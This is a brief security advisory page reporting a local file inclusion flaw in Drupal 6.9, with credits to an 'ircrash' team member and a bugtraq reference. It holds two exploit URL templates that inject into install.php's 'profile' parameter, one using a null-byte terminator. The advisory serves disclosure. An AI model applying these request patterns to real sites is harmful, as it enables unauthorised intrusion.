LFI in Drupal CMS

2009.02.11
Credit: Rasool Nasr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

Author : Rasool Nasr ------------------------------------------- Discovered by : Rasool Nasr ------------------------------------------- Exploited By : Rasool Nasr ------------------------------------------- E-Mail : rasool.nasr_at_gmail.com ------------------------------------------- WebSite : http://ircrash.com ------------------------------------------- Our Team : ircrash ------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ------------------------------------------- CMS: Drupal ( Version 6.9 ) Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz ------------------------------------------- LFI Exploit : http://[sitename]/drupal/install.php?profile=[shell code] or http://[sitename]/drupal/install.php?profile=[shell code]%00 -------------------------------------------

References:

http://seclists.org/bugtraq/2009/Feb/0064.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top